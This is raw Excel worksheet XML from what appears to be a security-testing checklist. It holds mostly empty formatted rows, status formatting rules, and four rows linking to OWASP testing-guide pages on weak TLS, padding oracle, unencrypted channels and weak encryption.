      <c r="I879" s="22"/>
      <c r="J879" s="22"/>
      <c r="K879" s="2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.75" customHeight="1">
      <c r="A880" s="19"/>
      <c r="B880" s="20"/>
      <c r="C880" s="21"/>
      <c r="D880" s="21"/>
      <c r="E880" s="19"/>
      <c r="F880" s="19"/>
      <c r="G880" s="19"/>
      <c r="H880" s="19"/>
      <c r="I880" s="22"/>
      <c r="J880" s="22"/>
      <c r="K880" s="2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.75" customHeight="1">
      <c r="A881" s="19"/>
      <c r="B881" s="20"/>
      <c r="C881" s="21"/>
      <c r="D881" s="21"/>
      <c r="E881" s="19"/>
      <c r="F881" s="19"/>
      <c r="G881" s="19"/>
      <c r="H881" s="19"/>
      <c r="I881" s="22"/>
      <c r="J881" s="22"/>
      <c r="K881" s="2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.75" customHeight="1">
      <c r="A882" s="19"/>
      <c r="B882" s="20"/>
      <c r="C882" s="21"/>
      <c r="D882" s="21"/>
      <c r="E882" s="19"/>
      <c r="F882" s="19"/>
      <c r="G882" s="19"/>
      <c r="H882" s="19"/>
      <c r="I882" s="22"/>
      <c r="J882" s="22"/>
      <c r="K882" s="2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.75" customHeight="1">
      <c r="A883" s="19"/>
      <c r="B883" s="20"/>
      <c r="C883" s="21"/>
      <c r="D883" s="21"/>
      <c r="E883" s="19"/>
      <c r="F883" s="19"/>
      <c r="G883" s="19"/>
      <c r="H883" s="19"/>
      <c r="I883" s="22"/>
      <c r="J883" s="22"/>
      <c r="K883" s="2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.75" customHeight="1">
      <c r="A884" s="19"/>
      <c r="B884" s="20"/>
      <c r="C884" s="21"/>
      <c r="D884" s="21"/>
      <c r="E884" s="19"/>
      <c r="F884" s="19"/>
      <c r="G884" s="19"/>
      <c r="H884" s="19"/>
      <c r="I884" s="22"/>
      <c r="J884" s="22"/>
      <c r="K884" s="2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.75" customHeight="1">
      <c r="A885" s="19"/>
      <c r="B885" s="20"/>
      <c r="C885" s="21"/>
      <c r="D885" s="21"/>
      <c r="E885" s="19"/>
      <c r="F885" s="19"/>
      <c r="G885" s="19"/>
      <c r="H885" s="19"/>
      <c r="I885" s="22"/>
      <c r="J885" s="22"/>
      <c r="K885" s="2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.75" customHeight="1">
      <c r="A886" s="19"/>
      <c r="B886" s="20"/>
      <c r="C886" s="21"/>
      <c r="D886" s="21"/>
      <c r="E886" s="19"/>
      <c r="F886" s="19"/>
      <c r="G886" s="19"/>
      <c r="H886" s="19"/>
      <c r="I886" s="22"/>
      <c r="J886" s="22"/>
      <c r="K886" s="2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.75" customHeight="1">
      <c r="A887" s="19"/>
      <c r="B887" s="20"/>
      <c r="C887" s="21"/>
      <c r="D887" s="21"/>
      <c r="E887" s="19"/>
      <c r="F887" s="19"/>
      <c r="G887" s="19"/>
      <c r="H887" s="19"/>
      <c r="I887" s="22"/>
      <c r="J887" s="22"/>
      <c r="K887" s="2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.75" customHeight="1">
      <c r="A888" s="19"/>
      <c r="B888" s="20"/>
      <c r="C888" s="21"/>
      <c r="D888" s="21"/>
      <c r="E888" s="19"/>
      <c r="F888" s="19"/>
      <c r="G888" s="19"/>
      <c r="H888" s="19"/>
      <c r="I888" s="22"/>
      <c r="J888" s="22"/>
      <c r="K888" s="2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.75" customHeight="1">
      <c r="A889" s="19"/>
      <c r="B889" s="20"/>
      <c r="C889" s="21"/>
      <c r="D889" s="21"/>
      <c r="E889" s="19"/>
      <c r="F889" s="19"/>
      <c r="G889" s="19"/>
      <c r="H889" s="19"/>
      <c r="I889" s="22"/>
      <c r="J889" s="22"/>
      <c r="K889" s="2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.75" customHeight="1">
      <c r="A890" s="19"/>
      <c r="B890" s="20"/>
      <c r="C890" s="21"/>
      <c r="D890" s="21"/>
      <c r="E890" s="19"/>
      <c r="F890" s="19"/>
      <c r="G890" s="19"/>
      <c r="H890" s="19"/>
      <c r="I890" s="22"/>
      <c r="J890" s="22"/>
      <c r="K890" s="2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.75" customHeight="1">
      <c r="A891" s="19"/>
      <c r="B891" s="20"/>
      <c r="C891" s="21"/>
      <c r="D891" s="21"/>
      <c r="E891" s="19"/>
      <c r="F891" s="19"/>
      <c r="G891" s="19"/>
      <c r="H891" s="19"/>
      <c r="I891" s="22"/>
      <c r="J891" s="22"/>
      <c r="K891" s="2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.75" customHeight="1">
      <c r="A892" s="19"/>
      <c r="B892" s="20"/>
      <c r="C892" s="21"/>
      <c r="D892" s="21"/>
      <c r="E892" s="19"/>
      <c r="F892" s="19"/>
      <c r="G892" s="19"/>
      <c r="H892" s="19"/>
      <c r="I892" s="22"/>
      <c r="J892" s="22"/>
      <c r="K892" s="2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.75" customHeight="1">
      <c r="A893" s="19"/>
      <c r="B893" s="20"/>
      <c r="C893" s="21"/>
      <c r="D893" s="21"/>
      <c r="E893" s="19"/>
      <c r="F893" s="19"/>
      <c r="G893" s="19"/>
      <c r="H893" s="19"/>
      <c r="I893" s="22"/>
      <c r="J893" s="22"/>
      <c r="K893" s="2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.75" customHeight="1">
      <c r="A894" s="19"/>
      <c r="B894" s="20"/>
      <c r="C894" s="21"/>
      <c r="D894" s="21"/>
      <c r="E894" s="19"/>
      <c r="F894" s="19"/>
      <c r="G894" s="19"/>
      <c r="H894" s="19"/>
      <c r="I894" s="22"/>
      <c r="J894" s="22"/>
      <c r="K894" s="2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.75" customHeight="1">
      <c r="A895" s="19"/>
      <c r="B895" s="20"/>
      <c r="C895" s="21"/>
      <c r="D895" s="21"/>
      <c r="E895" s="19"/>
      <c r="F895" s="19"/>
      <c r="G895" s="19"/>
      <c r="H895" s="19"/>
      <c r="I895" s="22"/>
      <c r="J895" s="22"/>
      <c r="K895" s="2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.75" customHeight="1">
      <c r="A896" s="19"/>
      <c r="B896" s="20"/>
      <c r="C896" s="21"/>
      <c r="D896" s="21"/>
      <c r="E896" s="19"/>
      <c r="F896" s="19"/>
      <c r="G896" s="19"/>
      <c r="H896" s="19"/>
      <c r="I896" s="22"/>
      <c r="J896" s="22"/>
      <c r="K896" s="2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.75" customHeight="1">
      <c r="A897" s="19"/>
      <c r="B897" s="20"/>
      <c r="C897" s="21"/>
      <c r="D897" s="21"/>
      <c r="E897" s="19"/>
      <c r="F897" s="19"/>
      <c r="G897" s="19"/>
      <c r="H897" s="19"/>
      <c r="I897" s="22"/>
      <c r="J897" s="22"/>
      <c r="K897" s="2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.75" customHeight="1">
      <c r="A898" s="19"/>
      <c r="B898" s="20"/>
      <c r="C898" s="21"/>
      <c r="D898" s="21"/>
      <c r="E898" s="19"/>
      <c r="F898" s="19"/>
      <c r="G898" s="19"/>
      <c r="H898" s="19"/>
      <c r="I898" s="22"/>
      <c r="J898" s="22"/>
      <c r="K898" s="2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.75" customHeight="1">
      <c r="A899" s="19"/>
      <c r="B899" s="20"/>
      <c r="C899" s="21"/>
      <c r="D899" s="21"/>
      <c r="E899" s="19"/>
      <c r="F899" s="19"/>
      <c r="G899" s="19"/>
      <c r="H899" s="19"/>
      <c r="I899" s="22"/>
      <c r="J899" s="22"/>
      <c r="K899" s="2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.75" customHeight="1">
      <c r="A900" s="19"/>
      <c r="B900" s="20"/>
      <c r="C900" s="21"/>
      <c r="D900" s="21"/>
      <c r="E900" s="19"/>
      <c r="F900" s="19"/>
      <c r="G900" s="19"/>
      <c r="H900" s="19"/>
      <c r="I900" s="22"/>
      <c r="J900" s="22"/>
      <c r="K900" s="2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.75" customHeight="1">
      <c r="A901" s="19"/>
      <c r="B901" s="20"/>
      <c r="C901" s="21"/>
      <c r="D901" s="21"/>
      <c r="E901" s="19"/>
      <c r="F901" s="19"/>
      <c r="G901" s="19"/>
      <c r="H901" s="19"/>
      <c r="I901" s="22"/>
      <c r="J901" s="22"/>
      <c r="K901" s="2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.75" customHeight="1">
      <c r="A902" s="19"/>
      <c r="B902" s="20"/>
      <c r="C902" s="21"/>
      <c r="D902" s="21"/>
      <c r="E902" s="19"/>
      <c r="F902" s="19"/>
      <c r="G902" s="19"/>
      <c r="H902" s="19"/>
      <c r="I902" s="22"/>
      <c r="J902" s="22"/>
      <c r="K902" s="2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.75" customHeight="1">
      <c r="A903" s="19"/>
      <c r="B903" s="20"/>
      <c r="C903" s="21"/>
      <c r="D903" s="21"/>
      <c r="E903" s="19"/>
      <c r="F903" s="19"/>
      <c r="G903" s="19"/>
      <c r="H903" s="19"/>
      <c r="I903" s="22"/>
      <c r="J903" s="22"/>
      <c r="K903" s="2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.75" customHeight="1">
      <c r="A904" s="19"/>
      <c r="B904" s="20"/>
      <c r="C904" s="21"/>
      <c r="D904" s="21"/>
      <c r="E904" s="19"/>
      <c r="F904" s="19"/>
      <c r="G904" s="19"/>
      <c r="H904" s="19"/>
      <c r="I904" s="22"/>
      <c r="J904" s="22"/>
      <c r="K904" s="2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.75" customHeight="1">
      <c r="A905" s="19"/>
      <c r="B905" s="20"/>
      <c r="C905" s="21"/>
      <c r="D905" s="21"/>
      <c r="E905" s="19"/>
      <c r="F905" s="19"/>
      <c r="G905" s="19"/>
      <c r="H905" s="19"/>
      <c r="I905" s="22"/>
      <c r="J905" s="22"/>
      <c r="K905" s="2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.75" customHeight="1">
      <c r="A906" s="19"/>
      <c r="B906" s="20"/>
      <c r="C906" s="21"/>
      <c r="D906" s="21"/>
      <c r="E906" s="19"/>
      <c r="F906" s="19"/>
      <c r="G906" s="19"/>
      <c r="H906" s="19"/>
      <c r="I906" s="22"/>
      <c r="J906" s="22"/>
      <c r="K906" s="2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.75" customHeight="1">
      <c r="A907" s="19"/>
      <c r="B907" s="20"/>
      <c r="C907" s="21"/>
      <c r="D907" s="21"/>
      <c r="E907" s="19"/>
      <c r="F907" s="19"/>
      <c r="G907" s="19"/>
      <c r="H907" s="19"/>
      <c r="I907" s="22"/>
      <c r="J907" s="22"/>
      <c r="K907" s="2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.75" customHeight="1">
      <c r="A908" s="19"/>
      <c r="B908" s="20"/>
      <c r="C908" s="21"/>
      <c r="D908" s="21"/>
      <c r="E908" s="19"/>
      <c r="F908" s="19"/>
      <c r="G908" s="19"/>
      <c r="H908" s="19"/>
      <c r="I908" s="22"/>
      <c r="J908" s="22"/>
      <c r="K908" s="2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.75" customHeight="1">
      <c r="A909" s="19"/>
      <c r="B909" s="20"/>
      <c r="C909" s="21"/>
      <c r="D909" s="21"/>
      <c r="E909" s="19"/>
      <c r="F909" s="19"/>
      <c r="G909" s="19"/>
      <c r="H909" s="19"/>
      <c r="I909" s="22"/>
      <c r="J909" s="22"/>
      <c r="K909" s="2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.75" customHeight="1">
      <c r="A910" s="19"/>
      <c r="B910" s="20"/>
      <c r="C910" s="21"/>
      <c r="D910" s="21"/>
      <c r="E910" s="19"/>
      <c r="F910" s="19"/>
      <c r="G910" s="19"/>
      <c r="H910" s="19"/>
      <c r="I910" s="22"/>
      <c r="J910" s="22"/>
      <c r="K910" s="2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.75" customHeight="1">
      <c r="A911" s="19"/>
      <c r="B911" s="20"/>
      <c r="C911" s="21"/>
      <c r="D911" s="21"/>
      <c r="E911" s="19"/>
      <c r="F911" s="19"/>
      <c r="G911" s="19"/>
      <c r="H911" s="19"/>
      <c r="I911" s="22"/>
      <c r="J911" s="22"/>
      <c r="K911" s="2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.75" customHeight="1">
      <c r="A912" s="19"/>
      <c r="B912" s="20"/>
      <c r="C912" s="21"/>
      <c r="D912" s="21"/>
      <c r="E912" s="19"/>
      <c r="F912" s="19"/>
      <c r="G912" s="19"/>
      <c r="H912" s="19"/>
      <c r="I912" s="22"/>
      <c r="J912" s="22"/>
      <c r="K912" s="2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.75" customHeight="1">
      <c r="A913" s="19"/>
      <c r="B913" s="20"/>
      <c r="C913" s="21"/>
      <c r="D913" s="21"/>
      <c r="E913" s="19"/>
      <c r="F913" s="19"/>
      <c r="G913" s="19"/>
      <c r="H913" s="19"/>
      <c r="I913" s="22"/>
      <c r="J913" s="22"/>
      <c r="K913" s="2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.75" customHeight="1">
      <c r="A914" s="19"/>
      <c r="B914" s="20"/>
      <c r="C914" s="21"/>
      <c r="D914" s="21"/>
      <c r="E914" s="19"/>
      <c r="F914" s="19"/>
      <c r="G914" s="19"/>
      <c r="H914" s="19"/>
      <c r="I914" s="22"/>
      <c r="J914" s="22"/>
      <c r="K914" s="2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.75" customHeight="1">
      <c r="A915" s="19"/>
      <c r="B915" s="20"/>
      <c r="C915" s="21"/>
      <c r="D915" s="21"/>
      <c r="E915" s="19"/>
      <c r="F915" s="19"/>
      <c r="G915" s="19"/>
      <c r="H915" s="19"/>
      <c r="I915" s="22"/>
      <c r="J915" s="22"/>
      <c r="K915" s="2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.75" customHeight="1">
      <c r="A916" s="19"/>
      <c r="B916" s="20"/>
      <c r="C916" s="21"/>
      <c r="D916" s="21"/>
      <c r="E916" s="19"/>
      <c r="F916" s="19"/>
      <c r="G916" s="19"/>
      <c r="H916" s="19"/>
      <c r="I916" s="22"/>
      <c r="J916" s="22"/>
      <c r="K916" s="2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.75" customHeight="1">
      <c r="A917" s="19"/>
      <c r="B917" s="20"/>
      <c r="C917" s="21"/>
      <c r="D917" s="21"/>
      <c r="E917" s="19"/>
      <c r="F917" s="19"/>
      <c r="G917" s="19"/>
      <c r="H917" s="19"/>
      <c r="I917" s="22"/>
      <c r="J917" s="22"/>
      <c r="K917" s="2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.75" customHeight="1">
      <c r="A918" s="19"/>
      <c r="B918" s="20"/>
      <c r="C918" s="21"/>
      <c r="D918" s="21"/>
      <c r="E918" s="19"/>
      <c r="F918" s="19"/>
      <c r="G918" s="19"/>
      <c r="H918" s="19"/>
      <c r="I918" s="22"/>
      <c r="J918" s="22"/>
      <c r="K918" s="2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.75" customHeight="1">
      <c r="A919" s="19"/>
      <c r="B919" s="20"/>
      <c r="C919" s="21"/>
      <c r="D919" s="21"/>
      <c r="E919" s="19"/>
      <c r="F919" s="19"/>
      <c r="G919" s="19"/>
      <c r="H919" s="19"/>
      <c r="I919" s="22"/>
      <c r="J919" s="22"/>
      <c r="K919" s="2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.75" customHeight="1">
      <c r="A920" s="19"/>
      <c r="B920" s="20"/>
      <c r="C920" s="21"/>
      <c r="D920" s="21"/>
      <c r="E920" s="19"/>
      <c r="F920" s="19"/>
      <c r="G920" s="19"/>
      <c r="H920" s="19"/>
      <c r="I920" s="22"/>
      <c r="J920" s="22"/>
      <c r="K920" s="2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.75" customHeight="1">
      <c r="A921" s="19"/>
      <c r="B921" s="20"/>
      <c r="C921" s="21"/>
      <c r="D921" s="21"/>
      <c r="E921" s="19"/>
      <c r="F921" s="19"/>
      <c r="G921" s="19"/>
      <c r="H921" s="19"/>
      <c r="I921" s="22"/>
      <c r="J921" s="22"/>
      <c r="K921" s="2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.75" customHeight="1">
      <c r="A922" s="19"/>
      <c r="B922" s="20"/>
      <c r="C922" s="21"/>
      <c r="D922" s="21"/>
      <c r="E922" s="19"/>
      <c r="F922" s="19"/>
      <c r="G922" s="19"/>
      <c r="H922" s="19"/>
      <c r="I922" s="22"/>
      <c r="J922" s="22"/>
      <c r="K922" s="2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.75" customHeight="1">
      <c r="A923" s="19"/>
      <c r="B923" s="20"/>
      <c r="C923" s="21"/>
      <c r="D923" s="21"/>
      <c r="E923" s="19"/>
      <c r="F923" s="19"/>
      <c r="G923" s="19"/>
      <c r="H923" s="19"/>
      <c r="I923" s="22"/>
      <c r="J923" s="22"/>
      <c r="K923" s="2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.75" customHeight="1">
      <c r="A924" s="19"/>
      <c r="B924" s="20"/>
      <c r="C924" s="21"/>
      <c r="D924" s="21"/>
      <c r="E924" s="19"/>
      <c r="F924" s="19"/>
      <c r="G924" s="19"/>
      <c r="H924" s="19"/>
      <c r="I924" s="22"/>
      <c r="J924" s="22"/>
      <c r="K924" s="2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.75" customHeight="1">
      <c r="A925" s="19"/>
      <c r="B925" s="20"/>
      <c r="C925" s="21"/>
      <c r="D925" s="21"/>
      <c r="E925" s="19"/>
      <c r="F925" s="19"/>
      <c r="G925" s="19"/>
      <c r="H925" s="19"/>
      <c r="I925" s="22"/>
      <c r="J925" s="22"/>
      <c r="K925" s="2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.75" customHeight="1">
      <c r="A926" s="19"/>
      <c r="B926" s="20"/>
      <c r="C926" s="21"/>
      <c r="D926" s="21"/>
      <c r="E926" s="19"/>
      <c r="F926" s="19"/>
      <c r="G926" s="19"/>
      <c r="H926" s="19"/>
      <c r="I926" s="22"/>
      <c r="J926" s="22"/>
      <c r="K926" s="2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.75" customHeight="1">
      <c r="A927" s="19"/>
      <c r="B927" s="20"/>
      <c r="C927" s="21"/>
      <c r="D927" s="21"/>
      <c r="E927" s="19"/>
      <c r="F927" s="19"/>
      <c r="G927" s="19"/>
      <c r="H927" s="19"/>
      <c r="I927" s="22"/>
      <c r="J927" s="22"/>
      <c r="K927" s="2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.75" customHeight="1">
      <c r="A928" s="19"/>
      <c r="B928" s="20"/>
      <c r="C928" s="21"/>
      <c r="D928" s="21"/>
      <c r="E928" s="19"/>
      <c r="F928" s="19"/>
      <c r="G928" s="19"/>
      <c r="H928" s="19"/>
      <c r="I928" s="22"/>
      <c r="J928" s="22"/>
      <c r="K928" s="2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.75" customHeight="1">
      <c r="A929" s="19"/>
      <c r="B929" s="20"/>
      <c r="C929" s="21"/>
      <c r="D929" s="21"/>
      <c r="E929" s="19"/>
      <c r="F929" s="19"/>
      <c r="G929" s="19"/>
      <c r="H929" s="19"/>
      <c r="I929" s="22"/>
      <c r="J929" s="22"/>
      <c r="K929" s="2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.75" customHeight="1">
      <c r="A930" s="19"/>
      <c r="B930" s="20"/>
      <c r="C930" s="21"/>
      <c r="D930" s="21"/>
      <c r="E930" s="19"/>
      <c r="F930" s="19"/>
      <c r="G930" s="19"/>
      <c r="H930" s="19"/>
      <c r="I930" s="22"/>
      <c r="J930" s="22"/>
      <c r="K930" s="2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.75" customHeight="1">
      <c r="A931" s="19"/>
      <c r="B931" s="20"/>
      <c r="C931" s="21"/>
      <c r="D931" s="21"/>
      <c r="E931" s="19"/>
      <c r="F931" s="19"/>
      <c r="G931" s="19"/>
      <c r="H931" s="19"/>
      <c r="I931" s="22"/>
      <c r="J931" s="22"/>
      <c r="K931" s="2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.75" customHeight="1">
      <c r="A932" s="19"/>
      <c r="B932" s="20"/>
      <c r="C932" s="21"/>
      <c r="D932" s="21"/>
      <c r="E932" s="19"/>
      <c r="F932" s="19"/>
      <c r="G932" s="19"/>
      <c r="H932" s="19"/>
      <c r="I932" s="22"/>
      <c r="J932" s="22"/>
      <c r="K932" s="2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.75" customHeight="1">
      <c r="A933" s="19"/>
      <c r="B933" s="20"/>
      <c r="C933" s="21"/>
      <c r="D933" s="21"/>
      <c r="E933" s="19"/>
      <c r="F933" s="19"/>
      <c r="G933" s="19"/>
      <c r="H933" s="19"/>
      <c r="I933" s="22"/>
      <c r="J933" s="22"/>
      <c r="K933" s="2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.75" customHeight="1">
      <c r="A934" s="19"/>
      <c r="B934" s="20"/>
      <c r="C934" s="21"/>
      <c r="D934" s="21"/>
      <c r="E934" s="19"/>
      <c r="F934" s="19"/>
      <c r="G934" s="19"/>
      <c r="H934" s="19"/>
      <c r="I934" s="22"/>
      <c r="J934" s="22"/>
      <c r="K934" s="2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</sheetData>
  <autoFilter ref="A3:K6" xr:uid="{6DEC4E49-E866-DB47-BB4B-93098970F7F3}">
    <filterColumn colId="8" showButton="0"/>
  </autoFilter>
  <mergeCells count="12">
    <mergeCell ref="A1:K1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:B4"/>
    <mergeCell ref="C3:C4"/>
    <mergeCell ref="E3:E4"/>
    <mergeCell ref="F3:F4"/>
    <mergeCell ref="I3:I4"/>
    <mergeCell ref="J3:J4"/>
    <mergeCell ref="K3:K4"/>
    <mergeCell ref="G3:G4"/>
    <mergeCell ref="D3:D4"/>
    <mergeCell ref="H3:H4"/>
  </mergeCells>
  <conditionalFormatting sqref="I5:I6">
    <cfRule type="cellIs" dxfId="134" priority="10" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I5:I6">
    <cfRule type="cellIs" dxfId="133" priority="11" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I5:I6">
    <cfRule type="cellIs" dxfId="132" priority="12" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10:I13 J5:K9 J14:K934 J1:K2">
    <cfRule type="containsText" dxfId="131" priority="13" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10:I13 J5:K9 J14:K934 J1:K2">
    <cfRule type="containsText" dxfId="130" priority="14" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10:I13 J5:K9 J14:K934 J1:K2">
    <cfRule type="containsText" dxfId="129" priority="15" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A11">
    <cfRule type="cellIs" dxfId="128" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A11">
    <cfRule type="cellIs" dxfId="127" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A11">
    <cfRule type="cellIs" dxfId="126" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A12">
    <cfRule type="cellIs" dxfId="125" priority="4" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A12">
    <cfRule type="cellIs" dxfId="124" priority="5" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A12">
    <cfRule type="cellIs" dxfId="123" priority="6" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="122" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="121" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="120" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="I5:I6" xr:uid="{63BBDC30-C7CF-7344-9DC3-AA91121105E8}">
      <formula1>$A$11:$A$13</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5:A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52000-EE24-8A46-B7C8-EC45D83D2012}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB93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14.42578125" defaultRowHeight="15" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.85546875" style="26" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="13.85546875" style="2" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="38.140625" style="2" customWidth="1"/>
    <col min="4" max="4" width="64.85546875" style="2" customWidth="1"/>
    <col min="5" max="5" width="12" style="2" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="14.85546875" style="2" customWidth="1"/>
    <col min="7" max="7" width="10" style="2" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="6.28515625" style="2" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="34.28515625" style="2" customWidth="1"/>
    <col min="10" max="10" width="11.28515625" style="2" bestFit="1" customWidth="1"/>
    <col min="11" max="28" width="8.85546875" style="2" customWidth="1"/>
    <col min="29" max="16384" width="14.42578125" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:28" ht="39" customHeight="1">
      <c r="A1" s="87" t="s">
        <v>360</v>
      </c>
      <c r="B1" s="87"/>
      <c r="C1" s="87"/>
      <c r="D1" s="87"/>
      <c r="E1" s="87"/>
      <c r="F1" s="87"/>
      <c r="G1" s="87"/>
      <c r="H1" s="87"/>
      <c r="I1" s="87"/>
      <c r="J1" s="8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3"/>
      <c r="B2" s="4"/>
      <c r="C2" s="5"/>
      <c r="D2" s="5"/>
      <c r="E2" s="3"/>
      <c r="F2" s="3"/>
      <c r="G2" s="3"/>
      <c r="H2" s="6"/>
      <c r="I2" s="6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95" customHeight="1">
      <c r="A3" s="85" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="88" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="88" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="88" t="s">
        <v>62</v>
      </c>
      <c r="E3" s="88" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="88" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="88" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="85" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="88" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="88" t="s">
        <v>10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7.100000000000001" customHeight="1">
      <c r="A4" s="86"/>
      <c r="B4" s="88"/>
      <c r="C4" s="88"/>
      <c r="D4" s="88"/>
      <c r="E4" s="88"/>
      <c r="F4" s="88"/>
      <c r="G4" s="88"/>
      <c r="H4" s="86"/>
      <c r="I4" s="88"/>
      <c r="J4" s="8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44">
      <c r="A5" s="7" t="s">
        <v>361</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>362</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security", "Testing for Weak Transport Layer Security")</f>
        <v>Testing for Weak Transport Layer Security</v>
      </c>
      <c r="D5" s="53" t="s">
        <v>363</v>
      </c>
      <c r="E5" s="11" t="s">
        <v>364</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>365</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>366</v>
      </c>
      <c r="H5" s="12"/>
      <c r="I5" s="13"/>
      <c r="J5" s="14" t="s">
        <v>16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8">
      <c r="A6" s="7" t="s">
        <v>367</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>368</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/02-Testing_for_Padding_Oracle", "Testing for Padding Oracle")</f>
        <v>Testing for Padding Oracle</v>
      </c>
      <c r="D6" s="53" t="s">
        <v>369</v>
      </c>
      <c r="E6" s="11" t="s">
        <v>370</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>258</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>371</v>
      </c>
      <c r="H6" s="12"/>
      <c r="I6" s="13"/>
      <c r="J6" s="14" t="s">
        <v>16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11.95">
      <c r="A7" s="7" t="s">
        <v>372</v>
      </c>
      <c r="B7" s="27" t="s">
        <v>373</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels", "Testing for Sensitive Information Sent via Unencrypted Channels")</f>
        <v>Testing for Sensitive Information Sent via Unencrypted Channels</v>
      </c>
      <c r="D7" s="53" t="s">
        <v>374</v>
      </c>
      <c r="E7" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>258</v>
      </c>
      <c r="G7" s="12" t="s">
        <v>375</v>
      </c>
      <c r="H7" s="12"/>
      <c r="I7" s="13"/>
      <c r="J7" s="14" t="s">
        <v>16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95.1">
      <c r="A8" s="7" t="s">
        <v>376</v>
      </c>
      <c r="B8" s="27" t="s">
        <v>377</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption", "Testing for Weak Encryption")</f>
        <v>Testing for Weak Encryption</v>
      </c>
      <c r="D8" s="53" t="s">
        <v>378</v>
      </c>
      <c r="E8" s="11" t="s">
        <v>379</v>
      </c>
      <c r="F8" s="12" t="s">
        <v>258</v>
      </c>
      <c r="G8" s="12" t="s">
        <v>380</v>
      </c>
      <c r="H8" s="12"/>
      <c r="I8" s="13"/>
      <c r="J8" s="14" t="s">
        <v>16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>
      <c r="A9" s="19"/>
      <c r="B9" s="20"/>
      <c r="C9" s="21"/>
      <c r="D9" s="21"/>
      <c r="E9" s="19"/>
      <c r="F9" s="19"/>
      <c r="G9" s="19"/>
      <c r="H9" s="22"/>
      <c r="I9" s="22"/>
      <c r="J9" s="2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>
      <c r="A10" s="19"/>
      <c r="B10" s="20"/>
      <c r="C10" s="21"/>
      <c r="D10" s="21"/>
      <c r="E10" s="19"/>
      <c r="F10" s="19"/>
      <c r="G10" s="19"/>
      <c r="H10" s="22"/>
      <c r="I10" s="22"/>
      <c r="J10" s="2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2.75" customHeight="1">
      <c r="A11" s="23"/>
      <c r="B11" s="23"/>
      <c r="C11" s="24"/>
      <c r="D11" s="24"/>
      <c r="E11" s="19"/>
      <c r="F11" s="19"/>
      <c r="G11" s="19"/>
      <c r="H11" s="22"/>
      <c r="I11" s="22"/>
      <c r="J11" s="2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95">
      <c r="A12" s="25" t="s">
        <v>57</v>
      </c>
      <c r="B12" s="20"/>
